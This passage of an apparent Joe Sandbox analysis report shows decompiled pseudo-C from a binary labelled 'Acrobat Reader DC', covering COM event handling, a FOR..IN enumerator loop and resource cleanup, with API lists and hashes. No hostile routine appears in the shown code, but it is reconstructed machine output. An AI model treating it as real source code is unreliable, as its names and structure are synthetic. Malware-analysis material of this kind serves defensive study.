                                  				char _v60;
                                  				signed int _v64;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				signed int* _v84;
                                  				char _v88;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				intOrPtr _v100;
                                  				char _v104;
                                  				char _v120;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				long _t133;
                                  				signed int _t134;
                                  				signed int _t141;
                                  				intOrPtr _t163;
                                  				signed int _t180;
                                  				signed int _t181;
                                  				intOrPtr _t185;
                                  				void* _t186;
                                  				intOrPtr _t188;
                                  				signed int _t203;
                                  				intOrPtr* _t204;
                                  				intOrPtr _t209;
                                  				char _t217;
                                  				void* _t218;
                                  				intOrPtr _t235;
                                  				signed int _t239;
                                  				void* _t243;
                                  				signed int _t247;
                                  				signed int _t250;
                                  				intOrPtr _t257;
                                  				signed int _t258;
                                  				signed int _t264;
                                  				signed int _t270;
                                  				char _t271;
                                  				signed int _t273;
                                  				intOrPtr _t274;
                                  				intOrPtr _t283;
                                  				void* _t287;
                                  
                                  				_t287 = __fp0;
                                  				_t243 = __edx;
                                  				if( *0x4a7f18 != 0) {
                                  					_t271 = _a4;
                                  					__eflags =  *((char*)(_t271 + 0x480)) - 1;
                                  					if(__eflags == 0) {
                                  						goto L1;
                                  					}
                                  					_t219 =  &_v120;
                                  					_v24 = 0;
                                  					_v88 = 0x488088;
                                  					_v84 = 0;
                                  					_v80 = 0;
                                  					_v76 = 0;
                                  					_v72 = 0;
                                  					_v64 = 1;
                                  					_v60 = 0;
                                  					E0040BC70( &_v120, __eflags);
                                  					InterlockedIncrement(0x4a7f04);
                                  					_t133 =  *0x4a7f04; // 0x0
                                  					__eflags = _t133 - 1;
                                  					if(_t133 == 1) {
                                  						L8:
                                  						_t134 =  *0x4a7f0c; // 0x0
                                  						__eflags =  *0x4a7f08 - _t134; // 0x0
                                  						if(__eflags == 0) {
                                  							L12:
                                  							InterlockedDecrement(0x4a7f04);
                                  							E00402250( &_v120);
                                  							E00408F40(_t262,  &_v72);
                                  							E00410C60( &_v88, _t262);
                                  							goto L1;
                                  						}
                                  						_t12 = ((_t134 & 0x0000003f) << 4) + 0x4a9138; // 0x4a9138
                                  						_t262 = _t12;
                                  						_t141 = E00431DC9(_t262);
                                  						__eflags = _t141;
                                  						if(_t141 != 0) {
                                  							goto L12;
                                  						}
                                  						_t13 = _t262 + 4; // 0x0
                                  						_v36 = _t262;
                                  						E00408E80( &_v72, _t219,  *((intOrPtr*)( *_t13)));
                                  						_t16 = _t262 + 4; // 0x0
                                  						_t216 = E0045340C( *((intOrPtr*)( *_t16 + 4)));
                                  						E00402160( &_v120, _t146, _t243, _t262);
                                  						_t19 = _t262 + 4; // 0x0
                                  						_t262 = E0045340C( *((intOrPtr*)( *_t19 + 8)));
                                  						E0040D200( &_v120,  *_t16, _t150, _t287);
                                  						__eflags = E00465124(_v120,  &_v20, __eflags, _t271, _v120,  &_v32,  &_v20,  &_v28,  &_v40);
                                  						if(__eflags != 0) {
                                  							 *((char*)(_t271 + 0x480)) = 1;
                                  							_t273 =  &_v104;
                                  							E00401B10(L"@COM_EVENTOBJ", _t273, __eflags);
                                  							E00401980(2, 1, E00432508( &_v72), _t273);
                                  							_t226 = _t273;
                                  							E00402250(_t273);
                                  							_t163 = E0040F410(_v32);
                                  							__eflags = _v20;
                                  							_t274 = _t163;
                                  							_v16 = _t274;
                                  							if(_v20 <= 0) {
                                  								L25:
                                  								_t247 =  *0x4a7f0c; // 0x0
                                  								_t250 = ((_t247 & 0x0000003f) << 4) + 0x4a9138;
                                  								E0046FE32(_t250);
                                  								_t264 = 1;
                                  								 *0x4a7f0c =  *0x4a7f0c + 1;
                                  								InterlockedDecrement(0x4a7f04);
                                  								E0046FF07(_t216, 1, _v32);
                                  								__eflags = _v20 - 1;
                                  								if(_v20 < 1) {
                                  									L48:
                                  									_t217 = _a4;
                                  									E0047D33E(_t226, _t250, _t287, _t217, _v32 + 1, 0, 0);
                                  									E0046FEB1(0x4a7f34);
                                  									_t265 = L"@COM_EVENTOBJ";
                                  									E00401B10(L"@COM_EVENTOBJ",  &_v104, __eflags);
                                  									E0040C2C0(2,  &_v104,  &_a4,  &_v24);
                                  									E00402250( &_v104);
                                  									__eflags =  *0x4a7f18;
                                  									if( *0x4a7f18 == 0) {
                                  										L29:
                                  										 *((char*)(_t217 + 0x480)) = 0;
                                  										L30:
                                  										E00402250( &_v120);
                                  										E00408F40(_t265,  &_v72);
                                  										E00410C60( &_v88, _t265);
                                  										return 1;
                                  									}
                                  									_t180 = E00432416(_a4);
                                  									__eflags = _t180;
                                  									if(_t180 != 0) {
                                  										goto L29;
                                  									}
                                  									_t181 =  *0x4a7f1c; // 0x0
                                  									__eflags = _t181;
                                  									if(_t181 == 0) {
                                  										goto L29;
                                  									}
                                  									 *((char*)(_t181 + 0x40)) = 0;
                                  									goto L29;
                                  								}
                                  								_t62 = _t264 + 0xb; // 0xc
                                  								_t218 = _t62;
                                  								_v12 = 0x18;
                                  								_v28 = _v84;
                                  								while(1) {
                                  									_v36 = _t264;
                                  									__eflags = _t264 - _v24;
                                  									if(_t264 <= _v24) {
                                  										goto L40;
                                  									}
                                  									_v40 = 0;
                                  									_v42 = 0;
                                  									_t188 =  *((intOrPtr*)(_t274 + 4));
                                  									_v104 = 0x485a84;
                                  									_v100 = 0;
                                  									_v96 = 0;
                                  									_v92 = 0;
                                  									_t235 =  *((intOrPtr*)(_t218 + _t188 + 4));
                                  									__eflags =  *((short*)(_t235 + 8)) - 0x41;
                                  									_v44 = _t250 | 0xffffffff;
                                  									if( *((short*)(_t235 + 8)) != 0x41) {
                                  										E00408F40(_t264,  &_v72);
                                  										_v64 = 1;
                                  										_v72 = 0;
                                  										L39:
                                  										_t250 =  &_v72;
                                  										E00401980(1, 0, _t250,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_v16 + 4)))))));
                                  										E0044B469(__eflags,  &_v52);
                                  										E0040EDC0( &_v104, _t264,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_v16 + 4)))))));
                                  										L41:
                                  										_t185 =  *((intOrPtr*)(_v16 + 4));
                                  										_t226 =  *(_t218 + _t185 + 4);
                                  										__eflags =  *((short*)(_t226 + 8)) - 0x41;
                                  										if( *((short*)(_t226 + 8)) != 0x41) {
                                  											_t186 = 8;
                                  											L47:
                                  											_v12 = _v12 + _t186;
                                  											_t264 = _t264 + 1;
                                  											_t218 = _t218 + _t186;
                                  											__eflags = _t264 - _v20;
                                  											if(_t264 <= _v20) {
                                  												_t71 =  &_v28;
                                  												 *_t71 =  &(_v28[1]);
                                  												__eflags =  *_t71;
                                  												_t274 = _v16;
                                  												continue;
                                  											}
                                  											goto L48;
                                  										}
                                  										_t250 =  *(_t218 + _t185 + 8);
                                  										_t203 =  *(_t250 + 8) & 0x0000ffff;
                                  										__eflags = _t203 - 0x4a;
                                  										if(_t203 == 0x4a) {
                                  											L45:
                                  											_t186 = 0x14;
                                  											goto L47;
                                  										}
                                  										__eflags = _t203 - 0x49;
                                  										if(_t203 == 0x49) {
                                  											goto L45;
                                  										}
                                  										_t186 = 0x10;
                                  										goto L47;
                                  									}
                                  									_t195 =  *((intOrPtr*)(_t218 + _t188 + 8));
                                  									_t239 =  *( *((intOrPtr*)(_t218 + _t188 + 8)) + 8) & 0x0000ffff;
                                  									__eflags = _t239 - 0x4a;
                                  									if(_t239 == 0x4a) {
                                  										L36:
                                  										E00402780(_t195, _t239,  &_v104);
                                  										_t195 =  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_t274 + 4))));
                                  										L37:
                                  										E00402780(_t195, _t239,  &_v104);
                                  										E00402710(0x7f,  &_v52, _t287);
                                  										E00402780( &_v52, _t239,  &_v104);
                                  										E0040A780(_a4, _t287,  &_v104,  &_v40,  &_v72, 0xffffffff);
                                  										_t264 = _v36;
                                  										goto L39;
                                  									}
                                  									__eflags = _t239 - 0x49;
                                  									if(_t239 != 0x49) {
                                  										goto L37;
                                  									}
                                  									goto L36;
                                  									L40:
                                  									_t250 =  *_v28;
                                  									__eflags = 0;
                                  									E00401980(1, 0, _t250,  *((intOrPtr*)( *((intOrPtr*)(_t218 +  *((intOrPtr*)(_t274 + 4)))))));
                                  									goto L41;
                                  								}
                                  							}
                                  							_t216 = 3;
                                  							_t265 = 3;
                                  							while(1) {
                                  								_t226 = _v36;
                                  								__eflags = _t216 -  *((intOrPtr*)(_t226 + 8));
                                  								if(_t216 >=  *((intOrPtr*)(_t226 + 8))) {
                                  									goto L25;
                                  								}
                                  								_t283 =  *((intOrPtr*)(_t274 + 4));
                                  								_t204 =  *((intOrPtr*)(_t283 + _t265 * 4));
                                  								__eflags =  *((short*)(_t204 + 8));
                                  								if( *((short*)(_t204 + 8)) != 0) {
                                  									L22:
                                  									_t257 =  *((intOrPtr*)(_t283 + 4 + _t265 * 4));
                                  									_t270 = _t265 + 1;
                                  									__eflags =  *((short*)(_t257 + 8)) - 0x41;
                                  									if( *((short*)(_t257 + 8)) == 0x41) {
                                  										_t270 = _t270 + 2;
                                  										__eflags = _t270;
                                  									}
                                  									E0040BA10(_t216, _t226, _t270,  &_v88,  *((intOrPtr*)( *((intOrPtr*)(_t226 + 4)) + _t216 * 4)));
                                  									_t274 = _v16;
                                  									_t209 = _v24 + 1;
                                  									_v24 = _t209;
                                  									__eflags = _t209 - _v20;
                                  									if(_t209 < _v20) {
                                  										_t216 = _t216 + 1;
                                  										_t265 = _t270 + 1;
                                  										__eflags = _t265;
                                  										continue;
                                  									}
                                  									goto L25;
                                  								} else {
                                  									goto L20;
                                  								}
                                  								while(1) {
                                  									L20:
                                  									__eflags =  *_t204 - 0x1e;
                                  									if( *_t204 != 0x1e) {
                                  										break;
                                  									}
                                  									_t204 =  *((intOrPtr*)(_t283 + 4 + _t265 * 4));
                                  									_t265 = _t265 + 1;
                                  									__eflags =  *((short*)(_t204 + 8));
                                  									if( *((short*)(_t204 + 8)) == 0) {
                                  										continue;
                                  									}
                                  									goto L22;
                                  								}
                                  								E0045E737(_t287, _a4, 0x91, 0xffffffff);
                                  								goto L30;
                                  							}
                                  							goto L25;
                                  						}
                                  						_t258 =  *0x4a7f0c; // 0x0
                                  						E0046FE32(((_t258 & 0x0000003f) << 4) + 0x4a9138);
                                  						 *0x4a7f0c =  *0x4a7f0c + 1;
                                  						__eflags =  *0x4a7f0c;
                                  						goto L12;
                                  					}
                                  					_t262 = 2;
                                  					while(1) {
                                  						__eflags = _t262;
                                  						if(_t262 == 0) {
                                  							break;
                                  						}
                                  						InterlockedDecrement(0x4a7f04);
                                  						Sleep(0xa);
                                  						InterlockedIncrement(0x4a7f04);
                                  						_t133 =  *0x4a7f04; // 0x0
                                  						_t262 = _t262 - 1;
                                  						__eflags = _t133 - 1;
                                  						if(_t133 != 1) {
                                  							continue;
                                  						}
                                  						goto L8;
                                  					}
                                  					__eflags = _t133 - 1;
                                  					if(_t133 == 1) {
                                  						goto L8;
                                  					}
                                  					goto L12;
                                  				}
                                  				L1:
                                  				return 0;
                                  			}

                                  APIs
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                  • String ID: @COM_EVENTOBJ
                                  • API String ID: 327565842-2228938565
                                  • Opcode ID: 70307c3fe60be0ab36e309062113007dfb865a7b1b1bb36a34d2cd10d052add5
                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                  • Opcode Fuzzy Hash: 70307c3fe60be0ab36e309062113007dfb865a7b1b1bb36a34d2cd10d052add5
                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 21%
                                  			E0046C84C(intOrPtr _a4, void* _a8, char _a12, intOrPtr _a16) {
                                  				char* _v8;
                                  				char* _v12;
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				intOrPtr* _v40;
                                  				intOrPtr* _v44;
                                  				intOrPtr* _v48;
                                  				char _v52;
                                  				char _v68;
                                  				void* _v76;
                                  				char _v84;
                                  				intOrPtr* _v92;
                                  				char _v100;
                                  				char _v132;
                                  				void* __edi;
                                  				void* __esi;
                                  				short* _t76;
                                  				intOrPtr _t89;
                                  				intOrPtr* _t92;
                                  				char _t95;
                                  				intOrPtr* _t100;
                                  				intOrPtr* _t102;
                                  				intOrPtr _t104;
                                  				intOrPtr* _t106;
                                  				intOrPtr* _t155;
                                  				intOrPtr* _t156;
                                  				intOrPtr* _t157;
                                  				intOrPtr* _t158;
                                  				intOrPtr* _t159;
                                  				intOrPtr* _t160;
                                  				intOrPtr* _t161;
                                  				intOrPtr* _t162;
                                  
                                  				_t162 = _a12;
                                  				_t155 = _a8;
                                  				_a8 = 0;
                                  				_v8 = L"_NewEnum";
                                  				_v12 = L"get__NewEnum";
                                  				_v52 = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				_v40 = 0;
                                  				_v36 = 0x20404;
                                  				_v32 = 0;
                                  				_v28 = 0xc0;
                                  				_v24 = 0x46000000;
                                  				E00412F40( &_v132, 0, 0x20);
                                  				if(_t155 == 0 || _a16 == 0 || _t162 == 0) {
                                  					L34:
                                  					_push(1);
                                  					_push(L"Null Object assignment in FOR..IN loop");
                                  					goto L35;
                                  				} else {
                                  					if(E00432416(_t162) != 0) {
                                  						L21:
                                  						_t76 =  *_t162;
                                  						__eflags = _t76;
                                  						if(_t76 != 0) {
                                  							__eflags =  *_t76 - 0xd;
                                  							if( *_t76 == 0xd) {
                                  								_t156 =  *((intOrPtr*)(_t76 + 8));
                                  								__imp__#8( &_v68);
                                  								__imp__#9( &_v68);
                                  								_t157 =  *((intOrPtr*)( *((intOrPtr*)( *_t156 + 0xc))))(_t156, 1,  &_v68,  &_a8);
                                  								__eflags = _t157;
                                  								if(_t157 >= 0) {
                                  									L29:
                                  									__eflags = _a8;
                                  									if(_a8 == 0) {
                                  										L32:
                                  										_v68 = 1;
                                  										E00408F40(_t157, _t162);
                                  										 *((intOrPtr*)(_t162 + 8)) = 1;
                                  										 *_t162 = 0;
                                  										_push( &_v68);
                                  									} else {
                                  										__eflags = _t157 - 1;
                                  										if(_t157 == 1) {
                                  											goto L32;
                                  										} else {
                                  											_push( &_v68);
                                  										}
                                  									}
                                  									E00468070(_a16);
                                  									__imp__#9( &_v68);
                                  									__eflags = 0;
                                  									return 0;
                                  								} else {
                                  									__eflags = _t157 - 1;
                                  									if(_t157 == 1) {
                                  										goto L29;
                                  									} else {
                                  										E00408F40(_t157, _t162);
                                  										 *((intOrPtr*)(_t162 + 8)) = 1;
                                  										 *_t162 = 0;
                                  										return E00451B42(_a4, _t157, 0, 0, 1);
                                  									}
                                  								}
                                  							} else {
                                  								_push(1);
                                  								_push(L"Incorrect Object type in FOR..IN loop");
                                  								L35:
                                  								_push(0);
                                  								_push(1);
                                  								_push(_a4);
                                  								return E00451B42();
                                  							}
                                  						} else {
                                  							return E00451B42(_a4, 1, 0, L"Null Object assignment in FOR..IN loop", 1);
                                  						}
                                  					} else {
                                  						_t89 =  *_t155;
                                  						if(_t89 == 0 ||  *((intOrPtr*)(_t155 + 8)) != 8) {
                                  							return E00451B42(_a4, 2, 0, L"Null Object assignment in FOR..IN loop", 1);
                                  						} else {
                                  							_t158 =  *((intOrPtr*)(_t89 + 8));
                                  							if(_t158 != 0) {
                                  								_t92 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x14))))(_t158, 0x482a18,  &_v8, 1, 0x400,  &_a12);
                                  								__eflags = _t92;
                                  								if(_t92 < 0) {
                                  									L10:
                                  									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x14))))(_t158, 0x482a18,  &_v12, 1, 0x400,  &_a12);
                                  									if(__eflags < 0) {
                                  										L12:
                                  										_a12 = 0xfffffffc;
                                  									} else {
                                  										__eflags = _a12 - 0xffffffff;
                                  										if(__eflags == 0) {
                                  											goto L12;
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = _a12 - 0xffffffff;
                                  									if(__eflags == 0) {
                                  										goto L10;
                                  									}
                                  								}
                                  								_t95 = E00410E53(_t158, _t162, __eflags);
                                  								_v16 = _t95;
                                  								_v52 = _t95;
                                  								_v44 = 0;
                                  								__imp__#8( &_v100, 0x10);
                                  								_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x18))))(_t158, _a12, 0x482a18, 0x800, 3,  &_v52,  &_v100,  &_v132,  &_v20);
                                  								_push(_v16);
                                  								_t159 = _t100;
                                  								E0041351D();
                                  								__eflags = _t159;
                                  								if(_t159 >= 0) {
                                  									_t102 = _v92;
                                  									__eflags = _t102;
                                  									if(_t102 == 0) {
                                  										goto L34;
                                  									} else {
                                  										_v84 = 0xd;
                                  										_t160 = _t102;
                                  										_t104 =  *((intOrPtr*)( *((intOrPtr*)( *_t102))))(_t102,  &_v36,  &_v76);
                                  										_v16 = _t104;
                                  										 *((intOrPtr*)( *((intOrPtr*)( *_t160 + 8))))(_t160);
                                  										_t106 = _v76;
                                  										_t161 = _t106;
                                  										__eflags = _t106;
                                  										if(_t106 != 0) {
                                  											 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x14))))(_t106);
                                  											E00468070(_t162,  &_v84);
                                  											 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 8))))(_t161);
                                  											goto L21;
                                  										} else {
                                  											return E00451B42(_a4, _v16, 0, 0, 1);
                                  										}
                                  									}
                                  								} else {
                                  									_push(1);
                                  									_push(0);
                                  									__eflags = _t159 - 0x80020009;
                                  									if(_t159 != 0x80020009) {
                                  										_push(0);
                                  										_push(_t159);
                                  										_push(_a4);
                                  										return E00451B42();
                                  									} else {
                                  										_push( &_v132);
                                  										_push(_t159);
                                  										_push(_a4);
                                  										return E00451B42();
                                  									}
                                  								}
                                  							} else {
                                  								return E00451B42(_a4, 2, 0, L"Null Object assignment in FOR..IN loop", 1);
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}








































                                  APIs
                                  • _memset.LIBCMT ref: 0046C89E
                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorInitLast_memset
                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                  • API String ID: 530611519-625585964
                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00401CB0(intOrPtr __ecx) {
                                  				intOrPtr _v8;
                                  				long _v12;
                                  				long* _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t97;
                                  				struct HWND__* _t100;
                                  				int** _t103;
                                  				intOrPtr* _t104;
                                  				struct HINSTANCE__** _t105;
                                  				intOrPtr* _t106;
                                  				void* _t119;
                                  				void* _t124;
                                  				void* _t126;
                                  				void* _t129;
                                  				void* _t131;
                                  				intOrPtr* _t159;
                                  				signed int _t173;
                                  				long* _t174;
                                  				intOrPtr _t203;
                                  				intOrPtr _t205;
                                  				signed int _t207;
                                  				signed int _t208;
                                  				signed int _t209;
                                  				long* _t210;
                                  				intOrPtr* _t212;
                                  				intOrPtr* _t217;
                                  				intOrPtr* _t219;
                                  				intOrPtr* _t220;
                                  				intOrPtr* _t221;
                                  				intOrPtr* _t222;
                                  				intOrPtr _t225;
                                  				void* _t226;
                                  
                                  				_t205 = __ecx;
                                  				_t97 = __ecx - 0x49c;
                                  				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx - 0x49c)) + 4)) + __ecx - 0x49c)) = "bZB";
                                  				_v12 = _t97;
                                  				 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 4)) + __ecx - 0x4a0)) =  *((intOrPtr*)( *_t97 + 4)) - 0x49c;
                                  				_t100 =  *(__ecx - 0x3b4);
                                  				_v8 = __ecx;
                                  				if(_t100 != 0) {
                                  					DestroyWindow(_t100);
                                  				}
                                  				mciSendStringW(L"close all", 0, 0, 0);
                                  				if( *((intOrPtr*)(_t205 - 0x2ec)) > 0) {
                                  					_t207 = 0;
                                  					do {
                                  						_t103 =  *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4);
                                  						if( *_t103 != 0) {
                                  							UnregisterHotKey( *0x497518,  *( *_t103));
                                  							_t171 =  *( *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4));
                                  							if( *( *( *((intOrPtr*)(_t205 - 0x2f0)) + _t207 * 4)) != 0) {
                                  								E00442B97(_t171);
                                  							}
                                  						}
                                  						_t207 = _t207 + 1;
                                  					} while (_t207 <  *((intOrPtr*)(_t205 - 0x2ec)));
                                  					goto L2;
                                  				} else {
                                  					L2:
                                  					if( *((intOrPtr*)(_t205 - 0x31c)) > 0) {
                                  						_t173 = 0;
                                  						do {
                                  							_t104 =  *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x320)) + _t173 * 4));
                                  							if( *_t104 != 0) {
                                  								_t159 =  *_t104;
                                  								if( *_t159 != 0) {
                                  									FindClose( *(_t159 + 8));
                                  									_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x320)) + _t173 * 4)))) + 0xc)));
                                  									E004111DC();
                                  									_t226 = _t226 + 4;
                                  								} else {
                                  									_t225 =  *((intOrPtr*)(_t159 + 4));
                                  									E0040DA20(_t225);
                                  									 *((intOrPtr*)(_t225 + 0x2c)) = 0;
                                  									 *((intOrPtr*)(_t225 + 0x30)) = 0;
                                  								}
                                  								_t203 =  *((intOrPtr*)(_t205 - 0x320));
                                  								_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t203 + _t173 * 4))));
                                  								_push( *((intOrPtr*)( *((intOrPtr*)(_t203 + _t173 * 4)))));
                                  								E004111DC();
                                  								_t226 = _t226 + 4;
                                  							}
                                  							_t173 = _t173 + 1;
                                  						} while (_t173 <  *((intOrPtr*)(_t205 - 0x31c)));
                                  					}
                                  					if( *((intOrPtr*)(_t205 - 0x30c)) > 0) {
                                  						_t208 = 0;
                                  						do {
                                  							_t105 =  *( *((intOrPtr*)(_t205 - 0x310)) + _t208 * 4);
                                  							if( *_t105 != 0) {
                                  								FreeLibrary( *_t105);
                                  							}
                                  							_t208 = _t208 + 1;
                                  						} while (_t208 <  *((intOrPtr*)(_t205 - 0x30c)));
                                  					}
                                  					if( *((intOrPtr*)(_t205 - 0x2fc)) > 0) {
                                  						_t209 = 0;
                                  						do {
                                  							_t183 =  *((intOrPtr*)(_t205 - 0x300));
                                  							_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4));
                                  							if( *_t106 != 0) {
                                  								VirtualFree( *( *_t106 + 0x10), 0, 0x8000);
                                  								_t183 =  *((intOrPtr*)(_t205 - 0x300));
                                  								_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4))));
                                  								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t205 - 0x300)) + _t209 * 4)))) != 0) {
                                  									E0044AFD1(_t155);
                                  								}
                                  							}
                                  							_t209 = _t209 + 1;
                                  						} while (_t209 <  *((intOrPtr*)(_t205 - 0x2fc)));
                                  					}
                                  					_t210 = _t205 - 0x2e4;
                                  					_v16 = _t210;
                                  					E00408F40(_t205, _t210);
                                  					_t210[2] = 1;
                                  					 *_t210 = 0;
                                  					_t174 = _t205 - 0x14;
                                  					E00408F40(_t205, _t174);
                                  					_t212 = _v12;
                                  					_t174[2] = 1;
                                  					 *_t174 = 0;
                                  					_t111 =  *((intOrPtr*)( *_t212 + 4)) + _t205;
                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 4)) + _t205 - 0x498)) == 0) {
                                  						L8:
                                  						E0040E750(_t183, _t205, _t212);
                                  						_t113 =  *((intOrPtr*)(_t205 - 0x28));
                                  						if( *((intOrPtr*)(_t205 - 0x28)) != 0) {
                                  							E004326ED(_t113);
                                  						}
                                  						E00408F40(_t205, _t174);
                                  						E004109A0(_t205 - 0x34);
                                  						E004109C0(_t205 - 0x44);
                                  						E00402250(_t205 - 0x64);
                                  						_t119 = E00401400(_t205 - 0x1a0);
                                  						_t217 = _t205 - 0x1bc;
                                  						 *_t217 = 0x48ab10;
                                  						E004109E0(_t119, _t217);
                                  						_push( *((intOrPtr*)(_t217 + 4)));
                                  						E004111DC();
                                  						E004012F0(_t205 - 0x2c4, _t205);
                                  						E00402250(_t205 - 0x2d4);
                                  						_t124 = E00408F40(_t205, _v16);
                                  						_t219 = _t205 - 0x2f4;
                                  						 *_t219 = 0x48ab10;
                                  						E004109E0(_t124, _t219);
                                  						_push( *((intOrPtr*)(_t219 + 4)));
                                  						_t126 = E004111DC();
                                  						_t220 = _t205 - 0x304;
                                  						 *_t220 = 0x48ab10;
                                  						E004109E0(_t126, _t220);
                                  						_push( *((intOrPtr*)(_t220 + 4)));
                                  						_t129 = E004111DC();
                                  						_t221 = _t205 - 0x314;
                                  						 *_t221 = 0x48ab10;
                                  						E004109E0(_t129, _t221);
                                  						_push( *((intOrPtr*)(_t221 + 4)));
                                  						_t131 = E004111DC();
                                  						_t222 = _t205 - 0x324;
                                  						 *_t222 = 0x48ab10;
                                  						E004109E0(_t131, _t222);
                                  						_push( *((intOrPtr*)(_t222 + 4)));
                                  						E004111DC();
                                  						E00410AA0(_t205 - 0x330);
                                  						E00410A70(_t205 - 0x340, _t205 - 0x2c4);
                                  						E00402250(_t205 - 0x350);
                                  						E00410A40(_t205 - 0x368);
                                  						E004109C0(_t205 - 0x374);
                                  						E004109C0(_t205 - 0x380);
                                  						E00402250(_t205 - 0x3c4);
                                  						E00402250(_t205 - 0x3d4);
                                  						E00402250(_t205 - 0x3e4);
                                  						return E0040DDD0(_t205 - 0x414);
                                  					} else {
                                  						_v12 = 0;
                                  						do {
                                  							E0040D410( &_v12, _t111 - 0x49c);
                                  							E0040DA90(_t174, _t111 - 0x49c,  *((intOrPtr*)( *_t212 + 4)) + _t205 - 0x498);
                                  							_t183 =  *_t212;
                                  							_t111 = _v8 +  *((intOrPtr*)( *_t212 + 4));
                                  							_t205 = _v8;
